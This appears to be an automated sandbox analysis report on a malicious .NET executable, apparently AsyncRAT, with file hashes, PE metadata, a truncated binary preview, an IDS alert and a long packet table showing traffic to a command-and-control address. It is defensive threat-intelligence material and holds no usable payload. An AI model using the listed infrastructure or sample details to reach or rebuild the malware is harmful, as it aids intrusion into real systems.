SSDEEP:	192:tRH6HN4QhfNQ8q8888yYAdbRjOaeUxRa95MqBYAeN450:8NxNb9OJ+a95MqaS50
MD5:	257C89A86DC3EF3B090DDA1BB60DE596
SHA1:	98665FFB12B352B31E25D35AEF6BD45748E3FED1
SHA-256:	C91F3B2BC60D25E1533FFB7E6A54EC87E691D0E8BE18815EB62C0720A9577709
SHA-512:	EA6F3AA952ECA7C2723319A47B1A3A8173826997145E1A9EAD0CA20233AB454A41BCD1FC634000E49D37F50666DBFFA7F60F155A5E707E0AE3EFC223B0B0A726
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=.ug...........!.................<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................<......H........%.............................................................."..(...."..(......(.......0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p.....(......(.........(....(.........*....0..:........e...+X......YE................................................+....+....,..?.+...+...+......X...2...8..............................(....(....}....~....r...pr...p~....~..... ....~.........o3.......-.s....z..<

C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.out

Download File

Process:	C:\Users\user\Desktop\vfdjo.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	702
Entropy (8bit):	5.239050892342422
Encrypted:	false
SSDEEP:	12:KJN/qR37L/6KRfxZUQfxiKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdn6KRfvHfsKax5DqBVKVrdFAMBJj
MD5:	5525BC7A2989B5208D8EC3035C314237
SHA1:	BCFCCAF3DAD4915951F9FF39A9E0A049903DF703
SHA-256:	76B7EEA12F00D447602BBFE86C07D005B0E44133F43858DCFF3F09484E9556EE
SHA-512:	AA4A361D8234A945C65DE9E14E17E10DBC4486B8F3FED69361B180C867ED94A213B27891C2D2EC4A04722EAECB8E85B1ABFF84E180DF22A3FADF0271A326D9D3
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.271667117495481
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	vfdjo.exe
File size:	36'352 bytes
MD5:	a03f28f2c0bf87d438a28e815d4b458a
SHA1:	60627893ce5e918c9b3dbe146f1b577f630129b5
SHA256:	1c9f4869c446e6e1e3c562631b1a10210294a7dd1367b4a58450b1a949e873e9
SHA512:	7ee6455f78cca337042521d024cdd4a54903e0b2276588b400fc9043354df28ca9cf0c9244028656c2e5e44e9f4889288aaa72e6d4ddb101380fb24d95727738
SSDEEP:	768:deBwuYH/uhx4yQF1F5e2nTesOhCZC3JtdkrDNxHloAnOT+k0uvN:dwwV2IfjeOOhCkmBlS+knN
TLSH:	F8F25B3039FA502AF173EF755EE4B5D68A6FB7733A07985D1050034A8B23A81DDD263A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{8............"...0.................. ........@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40a31a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xC7BC387B [Mon Mar 9 17:40:11 2076 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa2c8	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x5d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa2ac	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x8320	0x8400	0e69f14b119518d1c50049205764cde5	False	0.5184067234848485	data	4.2949679806930785	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x5d0	0x600	c06b946f859da09a93bcb2e38044cc3e	False	0.421875	data	4.192504613281525	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe000	0xc	0x200	bd97c438a5664439c43d889e5916c778	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xc090	0x340	data			0.40865384615384615
RT_MANIFEST	0xc3e0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-01T08:54:07.008837+0100	2842478	ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)	1	157.20.182.177	4449	192.168.2.4	49731	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 08:54:00.906151056 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:00.911082029 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:00.911214113 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:00.911398888 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:00.916142941 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.550087929 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.550101042 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.550111055 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.550127983 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.550137997 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.550188065 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.550209999 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.550223112 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.550235033 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.550266981 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.550365925 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.550379038 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.550390005 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.550425053 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.550441027 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.555119991 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.555133104 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.555144072 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.555152893 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.555212975 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.555243969 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.641062021 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.641103983 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.641114950 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.641180038 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.641191006 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.641200066 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.641299963 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.641415119 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.641480923 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.641494036 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.641545057 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.641546011 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.641596079 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.641607046 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.641618013 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.641653061 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.642306089 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.642350912 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.642362118 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.642410040 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.642410040 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.642505884 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.642517090 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.642529011 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.642584085 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.643268108 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.643280029 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.643290043 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.643322945 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.643333912 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.643340111 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.643343925 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.643378019 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.643419027 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.731997967 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.732026100 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.732038021 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.732120991 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.732145071 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.732158899 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.732170105 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.732208967 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.732229948 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.732301950 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.732353926 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.732364893 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.732419968 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.732561111 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.732618093 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.732630014 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.732640982 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.732708931 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.732721090 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.732749939 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.732774019 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.733077049 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.733128071 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.733139992 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.733211040 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.733256102 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.733267069 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.733277082 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.733311892 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.733336926 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.733392000 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.733455896 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.733468056 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.733624935 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.734132051 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.734143972 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.734155893 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.734209061 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.734209061 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.734246969 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.734257936 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.734268904 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.734278917 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.734318018 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.734329939 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.734412909 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.734425068 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.734483004 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.735136986 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.735150099 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.735161066 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.735246897 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.735259056 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.735270023 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.735280991 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.735333920 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.735378027 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.735390902 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.735438108 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.736109018 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.736121893 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.736135006 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.736146927 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.736155987 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.736166954 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.736238003 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.824048042 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.824062109 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.824074030 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.824115038 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.824229002 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.824297905 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.824306011 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.824318886 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.824362040 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.824496984 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.824508905 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.824520111 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.824529886 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.824539900 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.824549913 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.824559927 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.824567080 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.824577093 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.824631929 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.824664116 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.824682951 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.824728012 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.824803114 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.824901104 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.825001955 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.825028896 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.825040102 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.825052023 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.825081110 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.825148106 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.825155973 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.825160027 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.825176001 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.825186014 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.825217009 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.825264931 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.825323105 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.825334072 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.825344086 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.825355053 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.825390100 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.825463057 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.825815916 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.825826883 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.825838089 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.825912952 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.825995922 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.826006889 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.826018095 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.826023102 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.826035023 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.826066971 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.826069117 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.826069117 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.826100111 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.826129913 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.826163054 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.826318979 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.826329947 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.826340914 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.826350927 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.826406956 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.826406956 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.826952934 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.826965094 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.826975107 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.826987028 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.826997995 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.827008009 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.827018976 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.827034950 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.827034950 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.827076912 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.827280045 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.827291965 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.827301979 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.827317953 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.827328920 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.827337027 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.827339888 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.827353001 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.827353001 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.827375889 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.827425003 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.828119040 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.828130007 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.828140974 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.828212023 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.828253031 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.828263998 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.828274012 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.828284025 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.828294039 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.828325033 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.828325033 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.828352928 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.828394890 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.828407049 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.828488111 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:01.828533888 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:01.828545094 CET	80	49730	147.45.44.131	192.168.2.4
